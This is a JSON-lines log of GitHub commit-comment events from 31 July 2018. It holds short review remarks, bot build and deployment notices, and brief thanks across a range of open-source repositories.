{"id":"8046661332","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"Jobsnguyenad/jekyll-textile-converter"},"payload":{"comment":{"id":29911615,"position":null,"line":null,"path":null,"commit_id":"a3d51daf443400854d22f0ff9f5fd31671c72286","created_at":"2018-07-31T21:01:11Z","updated_at":"2018-07-31T21:01:11Z","author_association":"OWNER","body":"a3d51da"}},"created_at":"2018-07-31T21:01:11Z"}
{"id":"8046661534","type":"CommitCommentEvent","actor":{"login":"SsnL"},"repo":{"name":"goodlux/tutorials"},"payload":{"comment":{"id":29911616,"position":281,"line":281,"path":"beginner_source/dcgan_faces_tutorial.py","commit_id":"3f358722fc23121b14a46696cfaa229a37e1f7e6","created_at":"2018-07-31T21:01:13Z","updated_at":"2018-07-31T21:01:13Z","author_association":"NONE","body":"nit: use the new `nn.init` methods for better practice. (yes I know the `examples` repo is written this way because it predates the `nn.init`)"}},"created_at":"2018-07-31T21:01:13Z"}
{"id":"8046662799","type":"CommitCommentEvent","actor":{"login":"thysultan"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29911617,"position":13,"line":18,"path":"script/build/UMD.js","commit_id":"007cd3772f554eb46a2eed13f3218c9ddbfd07fa","created_at":"2018-07-31T21:01:28Z","updated_at":"2018-07-31T21:01:28Z","author_association":"OWNER","body":"Maybe we could just string replace `pkg` as needed in the build script as needed."}},"created_at":"2018-07-31T21:01:28Z"}
{"id":"8046663380","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29911620,"position":43,"line":420,"path":"source/gameengine/Ketsji/KX_Mesh.cpp","commit_id":"59d33db590c41d98e8b04d17c80d2f3e355d8d62","created_at":"2018-07-31T21:01:35Z","updated_at":"2018-07-31T21:01:35Z","author_association":"CONTRIBUTOR","body":"Ok… ce3a7651e246d9caf6a354b0553c33e9ffc89f23, this is a part of ISO C99…"}},"created_at":"2018-07-31T21:01:35Z"}
{"id":"8046665222","type":"CommitCommentEvent","actor":{"login":"ewilde"},"repo":{"name":"burtonr/templates"},"payload":{"comment":{"id":29911625,"position":1,"line":1,"path":"verify.sh","commit_id":"a1dc9ac19cc689eeb0c7070aeb559e4d6122ca9a","created_at":"2018-07-31T21:01:57Z","updated_at":"2018-07-31T21:01:57Z","author_association":"NONE","body":"@burton, that's great, just be aware that `sh` on travis is a `dash` shell not `bash`. I recently had to change an OpenFaaS script to use a bash shebang `#!/usr/bin/env bash` as the script was using bash commands not supported under `dash` like [for statements](https://github.com/openfaas/faas/blob/master/contrib/ci.sh#L11)"}},"created_at":"2018-07-31T21:01:57Z"}
{"id":"8046669398","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":29911634,"position":29,"line":29,"path":"packages/devel/flatbuffers/package.mk","commit_id":"2b68dbb30e6fee8ca79d42d070de6d6ea2436627","created_at":"2018-07-31T21:02:49Z","updated_at":"2018-07-31T21:02:49Z","author_association":"NONE","body":"`-DFLATBUFFERS_BUILD_FLATC=OFF` for the target"}},"created_at":"2018-07-31T21:02:49Z"}
{"id":"8046669502","type":"CommitCommentEvent","actor":{"login":"ppozeti"},"repo":{"name":"manfredsteyer/angular-oauth2-oidc"},"payload":{"comment":{"id":29911635,"position":null,"line":null,"path":null,"commit_id":"63bd4f337f28f41212a8da21f8a1faf37a9cd572","created_at":"2018-07-31T21:02:50Z","updated_at":"2018-07-31T21:02:50Z","author_association":"NONE","body":"Save the additionalState parameter in the localStorage."}},"created_at":"2018-07-31T21:02:50Z"}
{"id":"8046673987","type":"CommitCommentEvent","actor":{"login":"backamblock"},"repo":{"name":"sarjon/gamifications"},"payload":{"comment":{"id":29911645,"position":null,"line":null,"path":null,"commit_id":"efe088746ff2188ff1bf1f62cce6c1ecdab50599","created_at":"2018-07-31T21:03:43Z","updated_at":"2018-07-31T21:03:43Z","author_association":"CONTRIBUTOR","body":"perfect! thanks for this, makes the setup much easier 🥇 "}},"created_at":"2018-07-31T21:03:43Z"}
{"id":"8046674549","type":"CommitCommentEvent","actor":{"login":"yezhou"},"repo":{"name":"wix/react-native-navigation"},"payload":{"comment":{"id":29911650,"position":null,"line":null,"path":null,"commit_id":"5e66068f8a83e8d3a32a7b3f790bc9be94d54f07","created_at":"2018-07-31T21:03:50Z","updated_at":"2018-07-31T21:03:50Z","author_association":"NONE","body":"Hi, your commit cause a problem.\r\n\r\nI am using toggleTabs to set the tab hidden. after a modal close, the tab is not hide anymore. please fix it. thanks."}},"created_at":"2018-07-31T21:03:50Z"}
{"id":"8046677291","type":"CommitCommentEvent","actor":{"login":"dscorbett"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29911656,"position":17,"line":111,"path":"src/hb-ot-shape-complex-khmer.cc","commit_id":"8eef1964a708c3db52e5e7312689c4664afa9839","created_at":"2018-07-31T21:04:24Z","updated_at":"2018-07-31T21:04:24Z","author_association":"CONTRIBUTOR","body":"The first sentence has a typo."}},"created_at":"2018-07-31T21:04:24Z"}
{"id":"8046679918","type":"CommitCommentEvent","actor":{"login":"MwMaki"},"repo":{"name":"ssharba/gb-project"},"payload":{"comment":{"id":29911659,"position":12,"line":30,"path":"app/controllers/customers_controller.rb","commit_id":"c68472b3a94902ca4d8d7536fb5958d2a2abbf68","created_at":"2018-07-31T21:04:52Z","updated_at":"2018-07-31T21:04:52Z","author_association":"COLLABORATOR","body":"@NoorAlkattan do you think we need to check if current customer ?"}},"created_at":"2018-07-31T21:04:52Z"}
{"id":"8046683419","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"Jobsnguyenad/jekyll-textile-converter"},"payload":{"comment":{"id":29911663,"position":14,"line":14,"path":"Committee.html","commit_id":"a3d51daf443400854d22f0ff9f5fd31671c72286","created_at":"2018-07-31T21:05:32Z","updated_at":"2018-07-31T21:05:32Z","author_association":"OWNER","body":"Wikipedia-Teahouse.html\r\n(711 additions, 0 deletions not shown because the diff is too large. Please use a local Git client to view these changes.)"}},"created_at":"2018-07-31T21:05:32Z"}
{"id":"8046684203","type":"CommitCommentEvent","actor":{"login":"MwMaki"},"repo":{"name":"ssharba/gb-project"},"payload":{"comment":{"id":29911667,"position":14,"line":32,"path":"app/controllers/customers_controller.rb","commit_id":"c68472b3a94902ca4d8d7536fb5958d2a2abbf68","created_at":"2018-07-31T21:05:41Z","updated_at":"2018-07-31T21:05:41Z","author_association":"COLLABORATOR","body":"can you explain what this doing ?"}},"created_at":"2018-07-31T21:05:41Z"}
{"id":"8046689054","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"libretro/reicast-emulator"},"payload":{"comment":{"id":29911681,"position":null,"line":null,"path":null,"commit_id":"b7a698654b26efa15ef82b3ea4c2c846fd99bc1b","created_at":"2018-07-31T21:06:42Z","updated_at":"2018-07-31T21:06:42Z","author_association":"MEMBER","body":"Yes, that seems to fix it. Thanks!"}},"created_at":"2018-07-31T21:06:42Z"}
{"id":"8046689669","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29911685,"position":null,"line":null,"path":null,"commit_id":"f17a1d9a7494d76e539e0d65ffcd9b4bd6da0d9f","created_at":"2018-07-31T21:06:49Z","updated_at":"2018-07-31T21:06:49Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-311](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-311).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-311-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T21:06:49Z"}
{"id":"8046690753","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29911690,"position":null,"line":null,"path":null,"commit_id":"1ac8ea47523150af397b885741932d5508a79684","created_at":"2018-07-31T21:07:03Z","updated_at":"2018-07-31T21:07:03Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1049](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1049).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1049-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-31T21:07:03Z"}
{"id":"8046699256","type":"CommitCommentEvent","actor":{"login":"SimonStorlSchulke"},"repo":{"name":"SimonStorlSchulke/GoWebStuff"},"payload":{"comment":{"id":29911719,"position":null,"line":null,"path":null,"commit_id":"ea74a8798e9f37e33300e333f7c1196e1cdf1054","created_at":"2018-07-31T21:08:48Z","updated_at":"2018-07-31T21:08:48Z","author_association":"OWNER","body":"Zudem: Feedback als Markdown ermöglichen. HTML/JS unterbinden."}},"created_at":"2018-07-31T21:08:48Z"}
{"id":"8046700045","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29911720,"position":18,"line":18,"path":"content/en/docs/reference/glossary/csi.md","commit_id":"4cddc45ab778a32adbe6d976615ee08d53ab1c7d","created_at":"2018-07-31T21:08:58Z","updated_at":"2018-07-31T21:08:58Z","author_association":"NONE","body":"Note"}},"created_at":"2018-07-31T21:08:58Z"}
{"id":"8046701855","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29911721,"position":1380,"line":1380,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T21:09:20Z","updated_at":"2018-07-31T21:09:20Z","author_association":"OWNER","body":"AddScopes was actually a competing PR with AddLifetime, and I think latter contains all information we need here. But I might be biased because I wrote AddLifetime. Will add a TODO to investigate AddTemporaryDtors"}},"created_at":"2018-07-31T21:09:20Z"}
{"id":"8046703672","type":"CommitCommentEvent","actor":{"login":"nwf"},"repo":{"name":"CTSRD-CHERI/cheribsd"},"payload":{"comment":{"id":29911727,"position":18,"line":324,"path":"sys/kern/kern_sig.c","commit_id":"3cb1d9235d12a962d8888e8bae010485fd247d9a","created_at":"2018-07-31T21:09:42Z","updated_at":"2018-07-31T21:09:42Z","author_association":"NONE","body":"While guarding kernel-flavored pointers from entering userland is important, especially if we start thinking about dropping MMU protection or otherwise endowing capabilities themselves with unchecked privilege, it's also important to note that `si_addr` is (or, at least, can be) a *userland* (instruction) capability.  The concern with `ptrace` is less about kernel-flavored pointers leaking to userland than it is about *cross-address-space* userland pointers leaking."}},"created_at":"2018-07-31T21:09:42Z"}
{"id":"8046705303","type":"CommitCommentEvent","actor":{"login":"icoilhan"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29911730,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-31T21:10:03Z","updated_at":"2018-07-31T21:10:03Z","author_association":"NONE","body":"very nice"}},"created_at":"2018-07-31T21:10:03Z"}
{"id":"8046706711","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29911733,"position":null,"line":null,"path":null,"commit_id":"9f75d7f36ce661f938ef885f8ecfa3921a26ee91","created_at":"2018-07-31T21:10:20Z","updated_at":"2018-07-31T21:10:20Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-600](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-600).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-600-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-31T21:10:20Z"}
{"id":"8046714978","type":"CommitCommentEvent","actor":{"login":"msaelices"},"repo":{"name":"nativescript-vue/nativescript-vue"},"payload":{"comment":{"id":29911750,"position":null,"line":null,"path":null,"commit_id":"ce39a388ad5903c799cad8a54fc3fc29557f30b2","created_at":"2018-07-31T21:12:06Z","updated_at":"2018-07-31T21:12:06Z","author_association":"CONTRIBUTOR","body":"@rigor789 sure."}},"created_at":"2018-07-31T21:12:06Z"}
{"id":"8046716166","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29911752,"position":1519,"line":1519,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T21:12:21Z","updated_at":"2018-07-31T21:12:21Z","author_association":"OWNER","body":"I'm not sure about the original scenario I had in mind here, but with the restriction to acyclic CFGs, this becomes easier, too."}},"created_at":"2018-07-31T21:12:21Z"}
{"id":"8046716656","type":"CommitCommentEvent","actor":{"login":"chvnaveenkumar"},"repo":{"name":"chvnaveenkumar/SafeMyDrive"},"payload":{"comment":{"id":29911754,"position":null,"line":null,"path":null,"commit_id":"51ccc84996091c464742e0e71ac5a8a286b04a0a","created_at":"2018-07-31T21:12:28Z","updated_at":"2018-07-31T21:12:28Z","author_association":"OWNER","body":"SignUP Validation"}},"created_at":"2018-07-31T21:12:28Z"}
{"id":"8046722889","type":"CommitCommentEvent","actor":{"login":"rigor789"},"repo":{"name":"nativescript-vue/nativescript-vue"},"payload":{"comment":{"id":29911769,"position":null,"line":null,"path":null,"commit_id":"ce39a388ad5903c799cad8a54fc3fc29557f30b2","created_at":"2018-07-31T21:13:47Z","updated_at":"2018-07-31T21:13:47Z","author_association":"MEMBER","body":"@msaelices thanks!"}},"created_at":"2018-07-31T21:13:47Z"}
{"id":"8046726060","type":"CommitCommentEvent","actor":{"login":"arfoll"},"repo":{"name":"intel-iot-devkit/mraa"},"payload":{"comment":{"id":29911775,"position":15,"line":82,"path":"CMakeLists.txt","commit_id":"d24457f9a15f5ad4470d55bc69fbece22ce97bfc","created_at":"2018-07-31T21:14:27Z","updated_at":"2018-07-31T21:14:27Z","author_association":"COLLABORATOR","body":"i'm pretty sure it was a ubuntu 12.04/YP 1.6, worth a check but I'd dump all the old stuff, it was old back *then* :D"}},"created_at":"2018-07-31T21:14:27Z"}
{"id":"8046727725","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29911779,"position":null,"line":null,"path":null,"commit_id":"5b8fc2463b30e642ddf174754306c29c1ac2ae9b","created_at":"2018-07-31T21:14:48Z","updated_at":"2018-07-31T21:14:48Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b8fc2463b30e642ddf174754306c29c1ac2ae9b-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5b8fc2463b30e642ddf174754306c29c1ac2ae9b-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-31T21:14:48Z"}
{"id":"8046728239","type":"CommitCommentEvent","actor":{"login":"apemanzilla"},"repo":{"name":"SquidDev-CC/plethora"},"payload":{"comment":{"id":29911781,"position":null,"line":null,"path":null,"commit_id":"45fc6be8c10886317cbae2d765779b0d32cc8bc6","created_at":"2018-07-31T21:14:54Z","updated_at":"2018-07-31T21:14:54Z","author_association":"CONTRIBUTOR","body":":tada: "}},"created_at":"2018-07-31T21:14:54Z"}
{"id":"8046729358","type":"CommitCommentEvent","actor":{"login":"RodrigoEGC"},"repo":{"name":"RodrigoEGC/Test_Initial_GIT"},"payload":{"comment":{"id":29911786,"position":null,"line":null,"path":null,"commit_id":"3a7ec7135a2c859674781e576a60117970218e65","created_at":"2018-07-31T21:15:09Z","updated_at":"2018-07-31T21:15:09Z","author_association":"OWNER","body":"Edita o arquivo aí Sr. Morfina!"}},"created_at":"2018-07-31T21:15:09Z"}
{"id":"8046730366","type":"CommitCommentEvent","actor":{"login":"Zolmeister"},"repo":{"name":"thysultan/dio.js"},"payload":{"comment":{"id":29911794,"position":3,"line":3,"path":"index.js","commit_id":"007cd3772f554eb46a2eed13f3218c9ddbfd07fa","created_at":"2018-07-31T21:15:20Z","updated_at":"2018-07-31T21:15:20Z","author_association":"NONE","body":"should this default to `production` instead of `development`?"}},"created_at":"2018-07-31T21:15:20Z"}
{"id":"8046731436","type":"CommitCommentEvent","actor":{"login":"Kreceo"},"repo":{"name":"Kreceo/Portfolio-of-projects"},"payload":{"comment":{"id":29911797,"position":null,"line":null,"path":null,"commit_id":"5e7274e4bc185bc41597be027c8c94f1f0395439","created_at":"2018-07-31T21:15:34Z","updated_at":"2018-07-31T21:15:34Z","author_association":"OWNER","body":"This is a calculator for how many days you have been alive for, taking into account leap year.\r\n"}},"created_at":"2018-07-31T21:15:34Z"}
{"id":"8046733915","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/senapy"},"payload":{"comment":{"id":29911801,"position":6,"line":97,"path":"bin/senapy-cli","commit_id":"0386d38ff935aa43bdfbdbfd6a2a548d4f2d8084","created_at":"2018-07-31T21:16:06Z","updated_at":"2018-07-31T21:16:06Z","author_association":"MEMBER","body":"+1 je me suis foiré, j’affiche pas le vrai total. L’idée de base c’etait de l’afficher seulement si on avait rempli urls_opendata et urls_html, pour avoir le vrai total, je devrais le coder comme ca"}},"created_at":"2018-07-31T21:16:06Z"}
{"id":"8046734029","type":"CommitCommentEvent","actor":{"login":"barche"},"repo":{"name":"JuliaInterop/CxxWrap.jl"},"payload":{"comment":{"id":29911802,"position":17,"line":6,"path":".travis.yml","commit_id":"c2efab23dbe4fa46aaae7d698d01e46ee3c9a76e","created_at":"2018-07-31T21:16:08Z","updated_at":"2018-07-31T21:16:08Z","author_association":"COLLABORATOR","body":"Yes, this seemed sufficient and lighter on the CI, I'm not sure testing both versions on both platforms would catch much more, especially since I run on master on my local linux machine and the beta on my OS X machine. I'm willing to change it if it's a problem, though :)"}},"created_at":"2018-07-31T21:16:08Z"}
{"id":"8046735330","type":"CommitCommentEvent","actor":{"login":"stasgm"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29911803,"position":30,"line":26,"path":"src/components/EntityList/EntityList.tsx","commit_id":"3d1c87ef4e6cca2a9a392f028c4ed07f57e01600","created_at":"2018-07-31T21:16:25Z","updated_at":"2018-07-31T21:16:25Z","author_association":"OWNER","body":"Скобка не нравится?"}},"created_at":"2018-07-31T21:16:25Z"}
{"id":"8046739420","type":"CommitCommentEvent","actor":{"login":"SquidDev"},"repo":{"name":"SquidDev-CC/plethora"},"payload":{"comment":{"id":29911815,"position":null,"line":null,"path":null,"commit_id":"45fc6be8c10886317cbae2d765779b0d32cc8bc6","created_at":"2018-07-31T21:17:18Z","updated_at":"2018-07-31T21:17:18Z","author_association":"MEMBER","body":"2 months thinking about the silly thing, then implemented it in a couple of hours :/. On the bright side, should allow me to revive #106."}},"created_at":"2018-07-31T21:17:18Z"}
{"id":"8046739685","type":"CommitCommentEvent","actor":{"login":"corn91791"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29911818,"position":1,"line":1563,"path":"src/ripple/app/ledger/Ledger.cpp","commit_id":"a87c8d4a82c273d3137695fd7566d1864941a3bb","created_at":"2018-07-31T21:17:21Z","updated_at":"2018-07-31T21:17:21Z","author_association":"NONE","body":"This is all mine somebody’s trying to steal it"}},"created_at":"2018-07-31T21:17:21Z"}
{"id":"8046740733","type":"CommitCommentEvent","actor":{"login":"nutzaza55255"},"repo":{"name":"marpaia/fleet"},"payload":{"comment":{"id":29911820,"position":null,"line":null,"path":null,"commit_id":"9a85c8120ef3ecc33ed8480c0d04313be5a2d629","created_at":"2018-07-31T21:17:35Z","updated_at":"2018-07-31T21:17:35Z","author_association":"NONE","body":"1883"}},"created_at":"2018-07-31T21:17:35Z"}
{"id":"8046742263","type":"CommitCommentEvent","actor":{"login":"corn91791"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29911827,"position":69,"line":69,"path":"src/ripple/app/transactors/SetSignerList.cpp","commit_id":"a87c8d4a82c273d3137695fd7566d1864941a3bb","created_at":"2018-07-31T21:17:54Z","updated_at":"2018-07-31T21:17:54Z","author_association":"NONE","body":"Oh man why are you trying to steal my stuff"}},"created_at":"2018-07-31T21:17:54Z"}
{"id":"8046777468","type":"CommitCommentEvent","actor":{"login":"Vincent43"},"repo":{"name":"netblue30/firejail"},"payload":{"comment":{"id":29911906,"position":null,"line":null,"path":null,"commit_id":"123b2b1e256a17425afa32b238a9c448184f065b","created_at":"2018-07-31T21:25:16Z","updated_at":"2018-07-31T21:25:16Z","author_association":"COLLABORATOR","body":"Hiding it behind `--debug` is ok but I think those should be labelled as `Warning:` rather than `Error:` since they aren't fatal."}},"created_at":"2018-07-31T21:25:16Z"}
{"id":"8046777575","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29911907,"position":7,"line":72,"path":"README.md","commit_id":"fd7f5fb3d5b9d8bafaf801970f397b63f99e697d","created_at":"2018-07-31T21:25:18Z","updated_at":"2018-07-31T21:25:18Z","author_association":"NONE","body":"\t\tPut the new image in `/images/docs/` if it's for the documentation, and just `/images/` if it's for the website"}},"created_at":"2018-07-31T21:25:18Z"}
{"id":"8046779401","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29911913,"position":null,"line":null,"path":null,"commit_id":"fd7f5fb3d5b9d8bafaf801970f397b63f99e697d","created_at":"2018-07-31T21:25:40Z","updated_at":"2018-07-31T21:25:40Z","author_association":"NONE","body":"\t\tPut the new image in `/images/docs/` if it's for the documentation, and just `/images/` if it's for the website"}},"created_at":"2018-07-31T21:25:40Z"}
{"id":"8046780279","type":"CommitCommentEvent","actor":{"login":"NASU-G"},"repo":{"name":"NASU-G/assessment"},"payload":{"comment":{"id":29911914,"position":null,"line":null,"path":null,"commit_id":"9d4d379640af9b4b8eb15e56b1bb384f338b0215","created_at":"2018-07-31T21:25:50Z","updated_at":"2018-07-31T21:25:50Z","author_association":"OWNER","body":"9d4d379　で対応されました。"}},"created_at":"2018-07-31T21:25:50Z"}
{"id":"8046781441","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29911916,"position":7,"line":72,"path":"README.md","commit_id":"fd7f5fb3d5b9d8bafaf801970f397b63f99e697d","created_at":"2018-07-31T21:26:04Z","updated_at":"2018-07-31T21:26:04Z","author_association":"NONE","body":"https://github.com/kubernetes/website/commit/fd7f5fb3d5b9d8bafaf801970f397b63f99e697d"}},"created_at":"2018-07-31T21:26:04Z"}
{"id":"8046782099","type":"CommitCommentEvent","actor":{"login":"mgehre"},"repo":{"name":"mgehre/clang"},"payload":{"comment":{"id":29911918,"position":157,"line":157,"path":"lib/Analysis/Lifetime.cpp","commit_id":"5298257add037290f108946e024685e5e723de3f","created_at":"2018-07-31T21:26:12Z","updated_at":"2018-07-31T21:26:12Z","author_association":"OWNER","body":"Hm, the paper says about Aggregate \"class type with (some/all?) public data members and no user-provided copy/move operations\", where `CXXRecordDecl::isAggregate` checks \"no user-declared constructors, no private or protected non-static data members, no base classes, and no virtual functions\".\r\nIf the intention of the paper is to mean the latter, this should be clarified in the paper."}},"created_at":"2018-07-31T21:26:12Z"}
{"id":"8046783249","type":"CommitCommentEvent","actor":{"login":"Jobsnguyenad"},"repo":{"name":"kubernetes/website"},"payload":{"comment":{"id":29911921,"position":null,"line":null,"path":null,"commit_id":"fd7f5fb3d5b9d8bafaf801970f397b63f99e697d","created_at":"2018-07-31T21:26:25Z","updated_at":"2018-07-31T21:26:25Z","author_association":"NONE","body":"fd7f5fb"}},"created_at":"2018-07-31T21:26:25Z"}
{"id":"8046783871","type":"CommitCommentEvent","actor":{"login":"barche"},"repo":{"name":"JuliaInterop/CxxWrap.jl"},"payload":{"comment":{"id":29911923,"position":5,"line":157,"path":"README.md","commit_id":"16cb0518ece8e85e1cc7dcb6cc68a31fd6987a9b","created_at":"2018-07-31T21:26:32Z","updated_at":"2018-07-31T21:26:32Z","author_association":"COLLABORATOR","body":"True, fixed!"}},"created_at":"2018-07-31T21:26:32Z"}
{"id":"8046784208","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29911924,"position":null,"line":null,"path":null,"commit_id":"3793883fa866709fd3ecc917c32b086e81525392","created_at":"2018-07-31T21:26:36Z","updated_at":"2018-07-31T21:26:36Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-204](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-204).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-204-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-31T21:26:36Z"}
{"id":"8046787222","type":"CommitCommentEvent","actor":{"login":"ezrayst"},"repo":{"name":"cb-geo/mpm"},"payload":{"comment":{"id":29911928,"position":8,"line":244,"path":"include/particle.tcc","commit_id":"fc40badccf18c345887a3389babc9dd790fd1f83","created_at":"2018-07-31T21:27:12Z","updated_at":"2018-07-31T21:27:12Z","author_association":"CONTRIBUTOR","body":"It is computed, but it is not a private member of `particle`.\r\n\r\nDo you want to make it a private member then? "}},"created_at":"2018-07-31T21:27:12Z"}
{"id":"8046788900","type":"CommitCommentEvent","actor":{"login":"mdasil44"},"repo":{"name":"mdasil44/Ionic_Polymer_Glove"},"payload":{"comment":{"id":29911931,"position":null,"line":null,"path":null,"commit_id":"f7858db44d6ffa295f0739875efa0f9c4befd9c3","created_at":"2018-07-31T21:27:32Z","updated_at":"2018-07-31T21:27:32Z","author_association":"OWNER","body":"Calibration code implemented and \"working\". Only few sensors will semi-consistently calibrate (I1, M3, R1, P3,  and P4). Small bug noticed with I1, where calibration will go through, but result isn't actually calibrated (when sensor output is 10, actual load is greater than 10N). As well, calibrating I1 once will give a negative slope (as it should), but calibrating it again will cause a positive slope (increasing in wrong direction)."}},"created_at":"2018-07-31T21:27:32Z"}
{"id":"8046792602","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29911940,"position":null,"line":null,"path":null,"commit_id":"e17b15e5a09e6d01602963daebab5412c769a6e0","created_at":"2018-07-31T21:28:17Z","updated_at":"2018-07-31T21:28:17Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/e17b15e5a09e6d01602963daebab5412c769a6e0/index.html"}},"created_at":"2018-07-31T21:28:17Z"}
{"id":"8046792973","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911942,"position":null,"line":null,"path":null,"commit_id":"525d1908ac5a6e64d710844c1725ac0e6bebf83e","created_at":"2018-07-31T21:28:22Z","updated_at":"2018-07-31T21:28:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the GET request for Users](https://trello.com/c/yCn7aEPH/5-complete-the-get-request-for-users)"}},"created_at":"2018-07-31T21:28:22Z"}
{"id":"8046793391","type":"CommitCommentEvent","actor":{"login":"shankarnakai"},"repo":{"name":"filipenos/dotfiles"},"payload":{"comment":{"id":29911944,"position":26,"line":121,"path":"vimrc","commit_id":"821e64da94567ce1e084c75e3741fbe4fcf347ed","created_at":"2018-07-31T21:28:27Z","updated_at":"2018-07-31T21:28:27Z","author_association":"NONE","body":"se for ver é parecido com o 'C':\r\nghc main.hs -o main\r\nEu ainda preciso ver se tem algo como vim-haskell que tem alguns comands já\r\n"}},"created_at":"2018-07-31T21:28:27Z"}
{"id":"8046793821","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/RDBMS-API-Full"},"payload":{"comment":{"id":29911945,"position":null,"line":null,"path":null,"commit_id":"cfb754e799f1e904f6408954dba24ca1f1f424bd","created_at":"2018-07-31T21:28:32Z","updated_at":"2018-07-31T21:28:32Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Complete the Post request for users](https://trello.com/c/HnU2JG50/6-complete-the-post-request-for-users)"}},"created_at":"2018-07-31T21:28:32Z"}
{"id":"8046795424","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29911950,"position":null,"line":null,"path":null,"commit_id":"f23b0ddfebb946b129cf868f6ce539ddeb4ddb3f","created_at":"2018-07-31T21:28:51Z","updated_at":"2018-07-31T21:28:51Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-1175](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-1175).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1175-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-31T21:28:51Z"}
